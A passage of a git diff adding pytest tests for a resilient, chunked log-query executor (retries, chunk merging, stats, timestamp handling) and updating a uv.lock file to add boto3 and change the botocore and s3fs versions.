+ result = await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T13:00:00Z",
+ )
+
+ # Should have made multiple chunk calls (3 hours / 30 min = 6 chunks)
+ assert len(call_times) >= 4
+ assert "_chunked_execution" in result
+
+ @pytest.mark.asyncio
+ async def test_execute_chunked_disabled(self) -> None:
+ """Test that chunking can be disabled."""
+ executor = QueryResilientExecutor(enable_chunking=False)
+
+ call_count = 0
+
+ async def count_calls(**kwargs: Any) -> dict[str, Any]:
+ nonlocal call_count
+ call_count += 1
+ return {"status": "success", "data": {"result": []}}
+
+ mock_query_fn = AsyncMock(side_effect=count_calls)
+
+ # 3 hour range but chunking disabled
+ await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T13:00:00Z",
+ )
+
+ # Should have made only one call (not chunked)
+ assert call_count == 1
+
+ @pytest.mark.asyncio
+ async def test_execute_chunked_merge_results(self) -> None:
+ """Test that chunked results are properly merged."""
+ executor = QueryResilientExecutor(chunk_size_minutes=30)
+
+ chunk_num = 0
+
+ async def return_chunk_results(**kwargs: Any) -> dict[str, Any]:
+ nonlocal chunk_num
+ chunk_num += 1
+ return {
+ "status": "success",
+ "data": {"result": [{"stream": {}, "values": [[chunk_num, f"log{chunk_num}"]]}]},
+ }
+
+ mock_query_fn = AsyncMock(side_effect=return_chunk_results)
+
+ # Range > 2 hours triggers chunking (chunking threshold is > 2h)
+ result = await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T13:00:00Z", # 3 hours = 6 chunks
+ )
+
+ # Results should be merged (6 chunks for 3 hours / 30 min)
+ assert "data" in result
+ assert len(result["data"]["result"]) >= 2
+
+ def test_count_results_list(self) -> None:
+ """Test counting results from a list."""
+ executor = QueryResilientExecutor()
+
+ result = [1, 2, 3, 4, 5]
+ count = executor._count_results(result)
+
+ assert count == 5
+
+ def test_count_results_dict_with_streams(self) -> None:
+ """Test counting results from Loki-style response."""
+ executor = QueryResilientExecutor()
+
+ result = {
+ "data": {
+ "result": [
+ {"stream": {}, "values": [[1, "a"], [2, "b"]]},
+ {"stream": {}, "values": [[3, "c"]]},
+ ]
+ }
+ }
+ count = executor._count_results(result)
+
+ assert count == 3 # 2 + 1 values
+
+ def test_count_results_empty(self) -> None:
+ """Test counting results from empty response."""
+ executor = QueryResilientExecutor()
+
+ assert executor._count_results({}) == 0
+ assert executor._count_results({"data": {}}) == 0
+ assert executor._count_results({"data": {"result": []}}) == 0
+
+ def test_get_stats_summary(self) -> None:
+ """Test getting stats summary."""
+ executor = QueryResilientExecutor()
+ executor.stats.total_attempts = 10
+ executor.stats.successful_attempts = 8
+ executor.stats.timeout_count = 2
+ executor.stats.retry_count = 3
+ executor.stats.time_range_reductions = 1
+
+ summary = executor.get_stats_summary()
+
+ assert summary["total_attempts"] == 10
+ assert summary["successful_attempts"] == 8
+ assert summary["success_rate"] == "80.0%"
+ assert summary["timeout_count"] == 2
+ assert summary["retry_count"] == 3
+ assert summary["time_range_reductions"] == 1
+
+ def test_merge_chunk_results_empty(self) -> None:
+ """Test merging empty chunk results."""
+ executor = QueryResilientExecutor()
+
+ result = executor._merge_chunk_results([])
+
+ assert result["status"] == "success"
+ assert result["data"]["result"] == []
+
+ def test_merge_chunk_results_multiple(self) -> None:
+ """Test merging multiple chunk results."""
+ executor = QueryResilientExecutor()
+
+ chunks = [
+ {"data": {"result": [{"stream": "a", "values": [1, 2]}]}},
+ {"data": {"result": [{"stream": "b", "values": [3, 4]}]}},
+ {"data": {"result": [{"stream": "c", "values": [5]}]}},
+ ]
+
+ result = executor._merge_chunk_results(chunks)
+
+ assert result["status"] == "success"
+ assert len(result["data"]["result"]) == 3
+
+
+class TestGlobalExecutor:
+ """Tests for global executor functions."""
+
+ def test_get_resilient_executor_creates_default(self) -> None:
+ """Test that get_resilient_executor creates a default instance."""
+ reset_resilient_executor()
+
+ executor = get_resilient_executor()
+
+ assert executor is not None
+ assert isinstance(executor, QueryResilientExecutor)
+
+ reset_resilient_executor()
+
+ def test_get_resilient_executor_returns_same_instance(self) -> None:
+ """Test that get_resilient_executor returns the same instance."""
+ reset_resilient_executor()
+
+ executor1 = get_resilient_executor()
+ executor2 = get_resilient_executor()
+
+ assert executor1 is executor2
+
+ reset_resilient_executor()
+
+ def test_reset_resilient_executor(self) -> None:
+ """Test resetting the global executor."""
+ reset_resilient_executor()
+
+ executor1 = get_resilient_executor()
+ reset_resilient_executor()
+ executor2 = get_resilient_executor()
+
+ assert executor1 is not executor2
+
+ reset_resilient_executor()
+
+
+class TestTimeRangeFactors:
+ """Tests for time range reduction factors."""
+
+ def test_time_range_factors_order(self) -> None:
+ """Test that time range factors are in descending order."""
+ factors = QueryResilientExecutor.TIME_RANGE_FACTORS
+
+ assert factors == sorted(factors, reverse=True)
+ assert factors[0] == 1.0 # Start with full range
+ assert factors[-1] < 0.5 # End with small range
+
+ def test_backoff_delays_order(self) -> None:
+ """Test that backoff delays are in ascending order."""
+ delays = QueryResilientExecutor.BACKOFF_DELAYS
+
+ assert delays == sorted(delays)
+ assert delays[0] >= 1 # At least 1 second
+
+
+class TestEdgeCases:
+ """Tests for edge cases."""
+
+ @pytest.mark.asyncio
+ async def test_execute_with_z_suffix_timestamps(self) -> None:
+ """Test handling of Z suffix in timestamps."""
+ executor = QueryResilientExecutor()
+
+ mock_query_fn = AsyncMock(return_value={"status": "success", "data": {"result": []}})
+
+ result = await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T11:00:00Z",
+ )
+
+ assert result["status"] == "success"
+
+ @pytest.mark.asyncio
+ async def test_execute_with_offset_timestamps(self) -> None:
+ """Test handling of offset timestamps."""
+ executor = QueryResilientExecutor()
+
+ mock_query_fn = AsyncMock(return_value={"status": "success", "data": {"result": []}})
+
+ result = await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00+00:00",
+ end_time="2024-01-15T11:00:00+00:00",
+ )
+
+ assert result["status"] == "success"
+
+ @pytest.mark.asyncio
+ async def test_execute_with_grpc_error(self) -> None:
+ """Test handling of gRPC errors."""
+ executor = QueryResilientExecutor(max_retries=3)
+
+ mock_query_fn = AsyncMock(side_effect=Exception("grpc: connection failed"))
+
+ result = await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T10:30:00Z",
+ )
+
+ # Should give up on gRPC errors and move to next time range factor
+ assert result["status"] == "error"
+
+ @pytest.mark.asyncio
+ async def test_execute_with_non_timeout_error_response(self) -> None:
+ """Test handling of non-timeout error responses."""
+ executor = QueryResilientExecutor()
+
+ mock_query_fn = AsyncMock(
+ return_value={
+ "status": "error",
+ "error": "invalid query syntax",
+ }
+ )
+
+ await executor.execute_with_resilience(
+ query_fn=mock_query_fn,
+ query="{job='test'}",
+ start_time="2024-01-15T10:00:00Z",
+ end_time="2024-01-15T10:30:00Z",
+ )
+
+ # Non-timeout errors should be returned (not retried indefinitely)
+ # The result might still have metadata
+ assert executor.stats.timeout_count == 0
diff --git a/uv.lock b/uv.lock
index 82f787e0..92e371b4 100644
--- a/uv.lock
+++ b/uv.lock
@@ -7,24 +7,6 @@ resolution-markers = [
"python_full_version < '3.11'",
]
-[[package]]
-name = "aiobotocore"
-version = "2.26.0"
-source = { registry = "https://pypi.org/simple" }
-dependencies = [
- { name = "aiohttp" },
- { name = "aioitertools" },
- { name = "botocore" },
- { name = "jmespath" },
- { name = "multidict" },
- { name = "python-dateutil" },
- { name = "wrapt" },
-]
-sdist = { url = "https://files.pythonhosted.org/packages/4d/f8/99fa90d9c25b78292899fd4946fce97b6353838b5ecc139ad8ba1436e70c/aiobotocore-2.26.0.tar.gz", hash = "sha256:50567feaf8dfe2b653570b4491f5bc8c6e7fb9622479d66442462c021db4fadc", size = 122026, upload-time = "2025-11-28T07:54:59.956Z" }
-wheels = [
- { url = "https://files.pythonhosted.org/packages/b7/58/3bf0b7d474607dc7fd67dd1365c4e0f392c8177eaf4054e5ddee3ebd53b5/aiobotocore-2.26.0-py3-none-any.whl", hash = "sha256:a793db51c07930513b74ea7a95bd79aaa42f545bdb0f011779646eafa216abec", size = 87333, upload-time = "2025-11-28T07:54:58.457Z" },
-]
-
[[package]]
name = "aiofiles"
version = "24.1.0"
@@ -129,15 +111,6 @@ wheels = [
{ url = "https://files.pythonhosted.org/packages/5d/28/a8a9fc6957b2cee8902414e41816b5ab5536ecf43c3b1843c10e82c559b2/aiohttp-3.13.2-cp313-cp313-win_amd64.whl", hash = "sha256:a88d13e7ca367394908f8a276b89d04a3652044612b9a408a0bb22a5ed976a1a", size = 452192, upload-time = "2025-10-28T20:57:34.166Z" },
]
-[[package]]
-name = "aioitertools"
-version = "0.13.0"
-source = { registry = "https://pypi.org/simple" }
-sdist = { url = "https://files.pythonhosted.org/packages/fd/3c/53c4a17a05fb9ea2313ee1777ff53f5e001aefd5cc85aa2f4c2d982e1e38/aioitertools-0.13.0.tar.gz", hash = "sha256:620bd241acc0bbb9ec819f1ab215866871b4bbd1f73836a55f799200ee86950c", size = 19322, upload-time = "2025-11-06T22:17:07.609Z" }
-wheels = [
- { url = "https://files.pythonhosted.org/packages/10/a1/510b0a7fadc6f43a6ce50152e69dbd86415240835868bb0bd9b5b88b1e06/aioitertools-0.13.0-py3-none-any.whl", hash = "sha256:0be0292b856f08dfac90e31f4739432f4cb6d7520ab9eb73e143f4f2fa5259be", size = 24182, upload-time = "2025-11-06T22:17:06.502Z" },
-]
-
[[package]]
name = "aiosignal"
version = "1.4.0"
@@ -194,6 +167,7 @@ name = "ares"
version = "0.1.0"
source = { editable = "." }
dependencies = [
+ { name = "boto3" },
{ name = "cyclopts" },
{ name = "dreadnode" },
{ name = "httpx" },
@@ -226,6 +200,7 @@ dev = [
[package.metadata]
requires-dist = [
+ { name = "boto3", specifier = ">=1.42.25" },
{ name = "cyclopts", specifier = ">=4.2.0" },
{ name = "dreadnode", specifier = ">=1.17.0" },
{ name = "httpx", specifier = ">=0.28.0,<1.0.0" },
@@ -302,18 +277,32 @@ wheels = [
{ url = "https://files.pythonhosted.org/packages/02/e3/a4fa1946722c4c7b063cc25043a12d9ce9b4323777f89643be74cef2993c/backrefs-6.1-py39-none-any.whl", hash = "sha256:a9e99b8a4867852cad177a6430e31b0f6e495d65f8c6c134b68c14c3c95bf4b0", size = 381058, upload-time = "2025-11-15T14:52:06.698Z" },
]
+[[package]]
+name = "boto3"
+version = "1.42.25"
+source = { registry = "https://pypi.org/simple" }
+dependencies = [
+ { name = "botocore" },
+ { name = "jmespath" },
+ { name = "s3transfer" },
+]
+sdist = { url = "https://files.pythonhosted.org/packages/29/30/755a6c4b27ad4effefa9e407f84c6f0a69f75a21c0090beb25022dfcfd3f/boto3-1.42.25.tar.gz", hash = "sha256:ccb5e757dd62698d25766cc54cf5c47bea43287efa59c93cf1df8c8fbc26eeda", size = 112811, upload-time = "2026-01-09T20:27:44.73Z" }
+wheels = [
+ { url = "https://files.pythonhosted.org/packages/14/79/012734f4e510b0a6beec2a3d5f437b3e8ef52174b1d38b1d5fdc542316d7/boto3-1.42.25-py3-none-any.whl", hash = "sha256:8128bde4f9d5ffce129c76d1a2efe220e3af967a2ad30bc305ba088bbc96343d", size = 140575, upload-time = "2026-01-09T20:27:42.788Z" },
+]
+
[[package]]
name = "botocore"
-version = "1.41.5"
+version = "1.42.25"
source = { registry = "https://pypi.org/simple" }
dependencies = [
{ name = "jmespath" },
{ name = "python-dateutil" },
{ name = "urllib3" },
]
-sdist = { url = "https://files.pythonhosted.org/packages/90/22/7fe08c726a2e3b11a0aef8bf177e83891c9cb2dc1809d35c9ed91a9e60e6/botocore-1.41.5.tar.gz", hash = "sha256:0367622b811597d183bfcaab4a350f0d3ede712031ce792ef183cabdee80d3bf", size = 14668152, upload-time = "2025-11-26T20:27:38.026Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/2c/b5/8f961c65898deb5417c9e9e908ea6c4d2fe8bb52ff04e552f679c88ed2ce/botocore-1.42.25.tar.gz", hash = "sha256:7ae79d1f77d3771e83e4dd46bce43166a1ba85d58a49cffe4c4a721418616054", size = 14879737, upload-time = "2026-01-09T20:27:34.676Z" }
wheels = [
- { url = "https://files.pythonhosted.org/packages/4e/4e/21cd0b8f365449f1576f93de1ec8718ed18a7a3bc086dfbdeb79437bba7a/botocore-1.41.5-py3-none-any.whl", hash = "sha256:3fef7fcda30c82c27202d232cfdbd6782cb27f20f8e7e21b20606483e66ee73a", size = 14337008, upload-time = "2025-11-26T20:27:35.208Z" },
+ { url = "https://files.pythonhosted.org/packages/1e/b0/61e3e61d437c8c73f0821ce8a8e2594edfc1f423e354c38fa56396a4e4ca/botocore-1.42.25-py3-none-any.whl", hash = "sha256:470261966aab1d09a1cd4ba56810098834443602846559ba9504f6613dfa52dc", size = 14553881, upload-time = "2026-01-09T20:27:30.487Z" },
]
[[package]]
@@ -3008,16 +2997,27 @@ wheels = [
[[package]]
name = "s3fs"
-version = "2025.12.0"
+version = "0.4.2"
source = { registry = "https://pypi.org/simple" }
dependencies = [
- { name = "aiobotocore" },
- { name = "aiohttp" },
+ { name = "botocore" },
{ name = "fsspec" },
]
-sdist = { url = "https://files.pythonhosted.org/packages/cf/26/fff848df6a76d6fec20208e61548244639c46a741e296244c3404d6e7df0/s3fs-2025.12.0.tar.gz", hash = "sha256:8612885105ce14d609c5b807553f9f9956b45541576a17ff337d9435ed3eb01f", size = 81217, upload-time = "2025-12-03T15:34:04.754Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/d9/9a/504cb277632c4d325beabbd03bb43778f0decb9be22d9e0e6c62f44540c7/s3fs-0.4.2.tar.gz", hash = "sha256:2ca5de8dc18ad7ad350c0bd01aef0406aa5d0fff78a561f0f710f9d9858abdd0", size = 57527, upload-time = "2020-03-31T15:24:26.388Z" }
+wheels = [
+ { url = "https://files.pythonhosted.org/packages/b8/e4/b8fc59248399d2482b39340ec9be4bb2493846ac23641b43115a7e5cd675/s3fs-0.4.2-py3-none-any.whl", hash = "sha256:91c1dfb45e5217bd441a7a560946fe865ced6225ff7eb0fb459fe6e601a95ed3", size = 19791, upload-time = "2020-03-31T15:24:24.952Z" },
+]
+
+[[package]]
+name = "s3transfer"
+version = "0.16.0"
+source = { registry = "https://pypi.org/simple" }
+dependencies = [
+ { name = "botocore" },
+]
+sdist = { url = "https://files.pythonhosted.org/packages/05/04/74127fc843314818edfa81b5540e26dd537353b123a4edc563109d8f17dd/s3transfer-0.16.0.tar.gz", hash = "sha256:8e990f13268025792229cd52fa10cb7163744bf56e719e0b9cb925ab79abf920", size = 153827, upload-time = "2025-12-01T02:30:59.114Z" }
wheels = [
- { url = "https://files.pythonhosted.org/packages/44/8c/04797ebb53748b4d594d4c334b2d9a99f2d2e06e19ad505f1313ca5d56eb/s3fs-2025.12.0-py3-none-any.whl", hash = "sha256:89d51e0744256baad7ae5410304a368ca195affd93a07795bc8ba9c00c9effbb", size = 30726, upload-time = "2025-12-03T15:34:03.576Z" },
+ { url = "https://files.pythonhosted.org/packages/fc/51/727abb13f44c1fcf6d145979e1535a35794db0f6e450a0cb46aa24732fe2/s3transfer-0.16.0-py3-none-any.whl", hash = "sha256:18e25d66fed509e3868dc1572b3f427ff947dd2c56f844a5bf09481ad3f3b2fe", size = 86830, upload-time = "2025-12-01T02:30:57.729Z" },
]
[[package]]